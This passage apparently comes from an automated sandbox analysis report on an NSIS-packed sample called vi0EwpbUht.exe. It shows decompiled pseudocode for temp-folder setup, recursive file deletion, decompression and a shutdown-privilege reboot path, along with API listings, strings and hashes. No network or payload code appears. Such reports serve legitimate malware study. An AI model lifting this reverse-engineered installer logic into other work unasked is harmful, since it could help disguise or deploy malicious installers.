                                                                                                                          					}
                                                                                                                          					do {
                                                                                                                          						L4:
                                                                                                                          						_t44 = _t44 + 1;
                                                                                                                          						__eflags =  *_t44 - 0x20;
                                                                                                                          					} while ( *_t44 == 0x20);
                                                                                                                          					goto L5;
                                                                                                                          				}
                                                                                                                          				goto L20;
                                                                                                                          			}









































                                                                                                                          0x004031ee
                                                                                                                          0x004031f1
                                                                                                                          0x004031f1
                                                                                                                          0x004031fa
                                                                                                                          0x004031ff
                                                                                                                          0x004031ff
                                                                                                                          0x0040320a
                                                                                                                          0x00403210
                                                                                                                          0x00403215
                                                                                                                          0x00403217
                                                                                                                          0x00403239
                                                                                                                          0x0040323e
                                                                                                                          0x00403245
                                                                                                                          0x0040324c
                                                                                                                          0x00403250
                                                                                                                          0x004032b7
                                                                                                                          0x004032b7
                                                                                                                          0x004032bc
                                                                                                                          0x004032c6
                                                                                                                          0x004033b1
                                                                                                                          0x004033b7
                                                                                                                          0x004033c2
                                                                                                                          0x004033cb
                                                                                                                          0x004033cd
                                                                                                                          0x004033d2
                                                                                                                          0x004033d4
                                                                                                                          0x004033d6
                                                                                                                          0x004033d8
                                                                                                                          0x004033da
                                                                                                                          0x004033dc
                                                                                                                          0x004033de
                                                                                                                          0x004033ee
                                                                                                                          0x004033f0
                                                                                                                          0x004033f2
                                                                                                                          0x004033ff
                                                                                                                          0x0040340e
                                                                                                                          0x00403416
                                                                                                                          0x0040341e
                                                                                                                          0x0040341e
                                                                                                                          0x004033f2
                                                                                                                          0x004033de
                                                                                                                          0x004033da
                                                                                                                          0x00403423
                                                                                                                          0x00403429
                                                                                                                          0x0040342b
                                                                                                                          0x0040342f
                                                                                                                          0x0040342f
                                                                                                                          0x0040342b
                                                                                                                          0x00403434
                                                                                                                          0x00403439
                                                                                                                          0x0040343c
                                                                                                                          0x0040343e
                                                                                                                          0x0040343e
                                                                                                                          0x00403446
                                                                                                                          0x00403446
                                                                                                                          0x004032d5
                                                                                                                          0x004032dc
                                                                                                                          0x004032dc
                                                                                                                          0x00403252
                                                                                                                          0x00403258
                                                                                                                          0x004032a7
                                                                                                                          0x004032a7
                                                                                                                          0x004032b3
                                                                                                                          0x00000000
                                                                                                                          0x004032b3
                                                                                                                          0x00403261
                                                                                                                          0x0040326e
                                                                                                                          0x00403265
                                                                                                                          0x0040326b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040326d
                                                                                                                          0x0040326d
                                                                                                                          0x0040326d
                                                                                                                          0x00403272
                                                                                                                          0x00403274
                                                                                                                          0x0040327c
                                                                                                                          0x004032e8
                                                                                                                          0x004032ed
                                                                                                                          0x004032fc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403300
                                                                                                                          0x00403307
                                                                                                                          0x0040330d
                                                                                                                          0x00403313
                                                                                                                          0x0040331b
                                                                                                                          0x0040331b
                                                                                                                          0x00403329
                                                                                                                          0x00403330
                                                                                                                          0x00403339
                                                                                                                          0x0040333f
                                                                                                                          0x0040333f
                                                                                                                          0x0040334b
                                                                                                                          0x00403351
                                                                                                                          0x0040335b
                                                                                                                          0x0040336f
                                                                                                                          0x00403370
                                                                                                                          0x00403371
                                                                                                                          0x00403376
                                                                                                                          0x00403382
                                                                                                                          0x00403388
                                                                                                                          0x0040338f
                                                                                                                          0x00403392
                                                                                                                          0x00403398
                                                                                                                          0x00403398
                                                                                                                          0x0040338f
                                                                                                                          0x0040339c
                                                                                                                          0x004033a2
                                                                                                                          0x004033a2
                                                                                                                          0x004033a5
                                                                                                                          0x004033a6
                                                                                                                          0x004033a7
                                                                                                                          0x00000000
                                                                                                                          0x004033a7
                                                                                                                          0x0040327e
                                                                                                                          0x00403280
                                                                                                                          0x0040328b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403293
                                                                                                                          0x0040329e
                                                                                                                          0x004032a3
                                                                                                                          0x00000000
                                                                                                                          0x004032a3
                                                                                                                          0x0040321f
                                                                                                                          0x0040322b
                                                                                                                          0x00403230
                                                                                                                          0x00403235
                                                                                                                          0x00403237
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403237
                                                                                                                          0x00000000
                                                                                                                          0x004031d4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403188
                                                                                                                          0x00403188
                                                                                                                          0x00403188
                                                                                                                          0x00403189
                                                                                                                          0x00403189
                                                                                                                          0x00000000
                                                                                                                          0x00403188
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • #17.COMCTL32 ref: 004030EA
                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004030F5
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004030FC
                                                                                                                            • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                            • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                            • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                          • SHGetFileInfoA.SHELL32(0041F430,00000000,?,00000160,00000000,00000008), ref: 00403124
                                                                                                                            • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,sail Setup,NSIS Error), ref: 004059EA
                                                                                                                          • GetCommandLineA.KERNEL32(sail Setup,NSIS Error), ref: 00403139
                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 0040314C
                                                                                                                          • CharNextA.USER32(00000000,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000020), ref: 00403177
                                                                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040320A
                                                                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040321F
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040322B
                                                                                                                          • DeleteFileA.KERNELBASE(1033), ref: 0040323E
                                                                                                                          • OleUninitialize.OLE32(00000000), ref: 004032BC
                                                                                                                          • ExitProcess.KERNEL32 ref: 004032DC
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000,00000000), ref: 004032E8
                                                                                                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\3582-490,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000,00000000), ref: 004032F4
                                                                                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403300
                                                                                                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403307
                                                                                                                          • DeleteFileA.KERNEL32(0041F030,0041F030,?,00424000,?), ref: 00403351
                                                                                                                          • CopyFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,0041F030,00000001), ref: 00403365
                                                                                                                          • CloseHandle.KERNEL32(00000000,0041F030,0041F030,?,0041F030,00000000), ref: 00403392
                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033E7
                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403423
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403446
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                          • String ID: /D=$ _?=$"$"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\3582-490$C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$sail Setup$~nsu.tmp
                                                                                                                          • API String ID: 2278157092-1579053907
                                                                                                                          • Opcode ID: dac8a3e4b42874552ff3bf8d63fabb06b1ed44114a57f908459e075a30442c4d
                                                                                                                          • Instruction ID: cc286ec977d2638fbe9c092aa5ad16f4889e12429ffafd7da1ab197300c5bae6
                                                                                                                          • Opcode Fuzzy Hash: dac8a3e4b42874552ff3bf8d63fabb06b1ed44114a57f908459e075a30442c4d
                                                                                                                          • Instruction Fuzzy Hash: 9691B170A08340AED7216F619D49B6B7EACEB0530AF44047FF581B62D2C77C9E458B6E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E00405302(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				struct _WIN32_FIND_DATAA _v332;
                                                                                                                          				signed int _t37;
                                                                                                                          				char* _t49;
                                                                                                                          				signed int _t52;
                                                                                                                          				signed int _t55;
                                                                                                                          				signed int _t61;
                                                                                                                          				signed int _t63;
                                                                                                                          				void* _t65;
                                                                                                                          				signed int _t68;
                                                                                                                          				CHAR* _t70;
                                                                                                                          				CHAR* _t72;
                                                                                                                          				char* _t75;
                                                                                                                          
                                                                                                                          				_t72 = _a4;
                                                                                                                          				_t37 = E004055B1(__eflags, _t72);
                                                                                                                          				_v12 = _t37;
                                                                                                                          				if((_a8 & 0x00000008) != 0) {
                                                                                                                          					_t63 = DeleteFileA(_t72); // executed
                                                                                                                          					asm("sbb eax, eax");
                                                                                                                          					_t65 =  ~_t63 + 1;
                                                                                                                          					 *0x423f08 =  *0x423f08 + _t65;
                                                                                                                          					return _t65;
                                                                                                                          				}
                                                                                                                          				_t68 = _a8 & 0x00000001;
                                                                                                                          				__eflags = _t68;
                                                                                                                          				_v8 = _t68;
                                                                                                                          				if(_t68 == 0) {
                                                                                                                          					L5:
                                                                                                                          					E004059DD(0x421480, _t72);
                                                                                                                          					__eflags = _t68;
                                                                                                                          					if(_t68 == 0) {
                                                                                                                          						E00405517(_t72);
                                                                                                                          					} else {
                                                                                                                          						lstrcatA(0x421480, "\*.*");
                                                                                                                          					}
                                                                                                                          					__eflags =  *_t72;
                                                                                                                          					if( *_t72 != 0) {
                                                                                                                          						L10:
                                                                                                                          						lstrcatA(_t72, 0x409010);
                                                                                                                          						L11:
                                                                                                                          						_t70 =  &(_t72[lstrlenA(_t72)]);
                                                                                                                          						_t37 = FindFirstFileA(0x421480,  &_v332);
                                                                                                                          						__eflags = _t37 - 0xffffffff;
                                                                                                                          						_a4 = _t37;
                                                                                                                          						if(_t37 == 0xffffffff) {
                                                                                                                          							L29:
                                                                                                                          							__eflags = _v8;
                                                                                                                          							if(_v8 != 0) {
                                                                                                                          								_t31 = _t70 - 1;
                                                                                                                          								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                                                                                                          								__eflags =  *_t31;
                                                                                                                          							}
                                                                                                                          							goto L31;
                                                                                                                          						} else {
                                                                                                                          							goto L12;
                                                                                                                          						}
                                                                                                                          						do {
                                                                                                                          							L12:
                                                                                                                          							_t75 =  &(_v332.cFileName);
                                                                                                                          							_t49 = E004054FB( &(_v332.cFileName), 0x3f);
                                                                                                                          							__eflags =  *_t49;
                                                                                                                          							if( *_t49 != 0) {
                                                                                                                          								__eflags = _v332.cAlternateFileName;
                                                                                                                          								if(_v332.cAlternateFileName != 0) {
                                                                                                                          									_t75 =  &(_v332.cAlternateFileName);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							__eflags =  *_t75 - 0x2e;
                                                                                                                          							if( *_t75 != 0x2e) {
                                                                                                                          								L19:
                                                                                                                          								E004059DD(_t70, _t75);
                                                                                                                          								__eflags = _v332.dwFileAttributes & 0x00000010;
                                                                                                                          								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                          									E00405695(_t72);
                                                                                                                          									_t52 = DeleteFileA(_t72);
                                                                                                                          									__eflags = _t52;
                                                                                                                          									if(_t52 != 0) {
                                                                                                                          										E00404D7B(0xfffffff2, _t72);
                                                                                                                          									} else {
                                                                                                                          										__eflags = _a8 & 0x00000004;
                                                                                                                          										if((_a8 & 0x00000004) == 0) {
                                                                                                                          											 *0x423f08 =  *0x423f08 + 1;
                                                                                                                          										} else {
                                                                                                                          											E00404D7B(0xfffffff1, _t72);
                                                                                                                          											_push(0);
                                                                                                                          											_push(_t72);
                                                                                                                          											E0040572B();
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                                          									if(__eflags == 0) {
                                                                                                                          										E00405302(_t70, __eflags, _t72, _a8);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L27;
                                                                                                                          							}
                                                                                                                          							_t61 =  *((intOrPtr*)(_t75 + 1));
                                                                                                                          							__eflags = _t61;
                                                                                                                          							if(_t61 == 0) {
                                                                                                                          								goto L27;
                                                                                                                          							}
                                                                                                                          							__eflags = _t61 - 0x2e;
                                                                                                                          							if(_t61 != 0x2e) {
                                                                                                                          								goto L19;
                                                                                                                          							}
                                                                                                                          							__eflags =  *((char*)(_t75 + 2));
                                                                                                                          							if( *((char*)(_t75 + 2)) == 0) {
                                                                                                                          								goto L27;
                                                                                                                          							}
                                                                                                                          							goto L19;
                                                                                                                          							L27:
                                                                                                                          							_t55 = FindNextFileA(_a4,  &_v332);
                                                                                                                          							__eflags = _t55;
                                                                                                                          						} while (_t55 != 0);
                                                                                                                          						_t37 = FindClose(_a4);
                                                                                                                          						goto L29;
                                                                                                                          					}
                                                                                                                          					__eflags =  *0x421480 - 0x5c;
                                                                                                                          					if( *0x421480 != 0x5c) {
                                                                                                                          						goto L11;
                                                                                                                          					}
                                                                                                                          					goto L10;
                                                                                                                          				} else {
                                                                                                                          					__eflags = _t37;
                                                                                                                          					if(_t37 == 0) {
                                                                                                                          						L31:
                                                                                                                          						__eflags = _v8;
                                                                                                                          						if(_v8 == 0) {
                                                                                                                          							L39:
                                                                                                                          							return _t37;
                                                                                                                          						}
                                                                                                                          						__eflags = _v12;
                                                                                                                          						if(_v12 != 0) {
                                                                                                                          							_t37 = E00405CD8(_t72);
                                                                                                                          							__eflags = _t37;
                                                                                                                          							if(_t37 == 0) {
                                                                                                                          								goto L39;
                                                                                                                          							}
                                                                                                                          							E004054D0(_t72);
                                                                                                                          							E00405695(_t72);
                                                                                                                          							_t37 = RemoveDirectoryA(_t72);
                                                                                                                          							__eflags = _t37;
                                                                                                                          							if(_t37 != 0) {
                                                                                                                          								return E00404D7B(0xffffffe5, _t72);
                                                                                                                          							}
                                                                                                                          							__eflags = _a8 & 0x00000004;
                                                                                                                          							if((_a8 & 0x00000004) == 0) {
                                                                                                                          								goto L33;
                                                                                                                          							}
                                                                                                                          							E00404D7B(0xfffffff1, _t72);
                                                                                                                          							_push(0);
                                                                                                                          							_push(_t72);
                                                                                                                          							return E0040572B();
                                                                                                                          						}
                                                                                                                          						L33:
                                                                                                                          						 *0x423f08 =  *0x423f08 + 1;
                                                                                                                          						return _t37;
                                                                                                                          					}
                                                                                                                          					__eflags = _a8 & 0x00000002;
                                                                                                                          					if((_a8 & 0x00000002) == 0) {
                                                                                                                          						goto L31;
                                                                                                                          					}
                                                                                                                          					goto L5;
                                                                                                                          				}
                                                                                                                          			}

















                                                                                                                          0x004053fc
                                                                                                                          0x00405402
                                                                                                                          0x00405404
                                                                                                                          0x0040540a
                                                                                                                          0x0040540a
                                                                                                                          0x00405404
                                                                                                                          0x00000000
                                                                                                                          0x004053fa
                                                                                                                          0x004053db
                                                                                                                          0x004053de
                                                                                                                          0x004053e0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004053e2
                                                                                                                          0x004053e4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004053e6
                                                                                                                          0x004053ea
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040544a
                                                                                                                          0x00405454
                                                                                                                          0x0040545a
                                                                                                                          0x0040545a
                                                                                                                          0x00405465
                                                                                                                          0x00000000
                                                                                                                          0x00405465
                                                                                                                          0x0040537c
                                                                                                                          0x00405383
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405342
                                                                                                                          0x00405342
                                                                                                                          0x00405344
                                                                                                                          0x00405475
                                                                                                                          0x00405478
                                                                                                                          0x0040547b
                                                                                                                          0x004054cd
                                                                                                                          0x004054cd
                                                                                                                          0x004054cd
                                                                                                                          0x0040547d
                                                                                                                          0x00405480
                                                                                                                          0x0040548b
                                                                                                                          0x00405490
                                                                                                                          0x00405492
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405495
                                                                                                                          0x0040549b
                                                                                                                          0x004054a1
                                                                                                                          0x004054a7
                                                                                                                          0x004054a9
                                                                                                                          0x00000000
                                                                                                                          0x004054c5
                                                                                                                          0x004054ab
                                                                                                                          0x004054af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004054b4
                                                                                                                          0x004054b9
                                                                                                                          0x004054ba
                                                                                                                          0x00000000
                                                                                                                          0x004054bb
                                                                                                                          0x00405482
                                                                                                                          0x00405482
                                                                                                                          0x00000000
                                                                                                                          0x00405482
                                                                                                                          0x0040534a
                                                                                                                          0x0040534e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040534e

                                                                                                                          APIs
                                                                                                                          • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 00405320
                                                                                                                          • lstrcatA.KERNEL32(00421480,\*.*,00421480,?,00000000,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 0040536A
                                                                                                                          • lstrcatA.KERNEL32(?,00409010,?,00421480,?,00000000,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 0040538B
                                                                                                                          • lstrlenA.KERNEL32(?,?,00409010,?,00421480,?,00000000,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 00405391
                                                                                                                          • FindFirstFileA.KERNEL32(00421480,?,?,?,00409010,?,00421480,?,00000000,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 004053A2
                                                                                                                          • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405454
                                                                                                                          • FindClose.KERNEL32(?), ref: 00405465
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405302
                                                                                                                          • "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" , xrefs: 0040530C
                                                                                                                          • \*.*, xrefs: 00405364
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                          • String ID: "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                          • API String ID: 2035342205-4184975021
                                                                                                                          • Opcode ID: 839bd3744fd32e7d0185c0b890ed2fdcf981fbc651edb5541a67b6ee6968ffb2
                                                                                                                          • Instruction ID: 4b200e60d3e8d58e0ab6cbb93b3ca9934a2dcfa31e3b076817fab6d13423d761
                                                                                                                          • Opcode Fuzzy Hash: 839bd3744fd32e7d0185c0b890ed2fdcf981fbc651edb5541a67b6ee6968ffb2
                                                                                                                          • Instruction Fuzzy Hash: 45511230844A48B6DB226B228C45BFF3A78DF4275AF14813BF845751D1C77C4981DE6E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00405FA8() {
                                                                                                                          				unsigned short _t531;
                                                                                                                          				signed int _t532;
                                                                                                                          				void _t533;
                                                                                                                          				void* _t534;
                                                                                                                          				signed int _t535;
                                                                                                                          				signed int _t565;
                                                                                                                          				signed int _t568;
                                                                                                                          				signed int _t590;
                                                                                                                          				signed int* _t607;
                                                                                                                          				void* _t614;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					if( *(_t614 - 0x40) != 0) {
                                                                                                                          						 *(_t614 - 0x34) = 1;
                                                                                                                          						 *(_t614 - 0x84) = 7;
                                                                                                                          						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                                                                          						L132:
                                                                                                                          						 *(_t614 - 0x54) = _t607;
                                                                                                                          						L133:
                                                                                                                          						_t531 =  *_t607;
                                                                                                                          						_t590 = _t531 & 0x0000ffff;
                                                                                                                          						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                                                                          						if( *(_t614 - 0xc) >= _t565) {
                                                                                                                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                                                                          							 *(_t614 - 0x40) = 1;
                                                                                                                          							_t532 = _t531 - (_t531 >> 5);
                                                                                                                          							 *_t607 = _t532;
                                                                                                                          						} else {
                                                                                                                          							 *(_t614 - 0x10) = _t565;
                                                                                                                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                          							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                                                                          						}
                                                                                                                          						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                                                                          							L139:
                                                                                                                          							_t533 =  *(_t614 - 0x84);
                                                                                                                          							L140:
                                                                                                                          							 *(_t614 - 0x88) = _t533;
                                                                                                                          							goto L1;
                                                                                                                          						} else {
                                                                                                                          							L137:
                                                                                                                          							if( *(_t614 - 0x6c) == 0) {
                                                                                                                          								 *(_t614 - 0x88) = 5;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                          							goto L139;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                          						__esi =  *(__ebp - 0x60);
                                                                                                                          						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                          						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                          						__ecx =  *(__ebp - 0x3c);
                                                                                                                          						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                          						__ecx =  *(__ebp - 4);
                                                                                                                          						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                          						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                          						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          						if( *(__ebp - 0x38) >= 4) {
                                                                                                                          							if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                          								_t97 = __ebp - 0x38;
                                                                                                                          								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							 *(__ebp - 0x38) = 0;
                                                                                                                          						}
                                                                                                                          						if( *(__ebp - 0x34) == __edx) {
                                                                                                                          							__ebx = 0;
                                                                                                                          							__ebx = 1;
                                                                                                                          							L60:
                                                                                                                          							__eax =  *(__ebp - 0x58);
                                                                                                                          							__edx = __ebx + __ebx;
                                                                                                                          							__ecx =  *(__ebp - 0x10);
                                                                                                                          							__esi = __edx + __eax;
                                                                                                                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							 *(__ebp - 0x54) = __esi;
                                                                                                                          							__edi = __ax & 0x0000ffff;
                                                                                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								_t216 = __edx + 1; // 0x1
                                                                                                                          								__ebx = _t216;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x10) = __ecx;
                                                                                                                          								0x800 = 0x800 - __edi;
                                                                                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							 *(__ebp - 0x44) = __ebx;
                                                                                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          								L59:
                                                                                                                          								if(__ebx >= 0x100) {
                                                                                                                          									goto L54;
                                                                                                                          								}
                                                                                                                          								goto L60;
                                                                                                                          							} else {
                                                                                                                          								L57:
                                                                                                                          								if( *(__ebp - 0x6c) == 0) {
                                                                                                                          									 *(__ebp - 0x88) = 0xf;
                                                                                                                          									goto L170;
                                                                                                                          								}
                                                                                                                          								__ecx =  *(__ebp - 0x70);
                                                                                                                          								__eax =  *(__ebp - 0xc);
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          								_t202 = __ebp - 0x70;
                                                                                                                          								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          								goto L59;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							__eax =  *(__ebp - 0x14);
                                                                                                                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
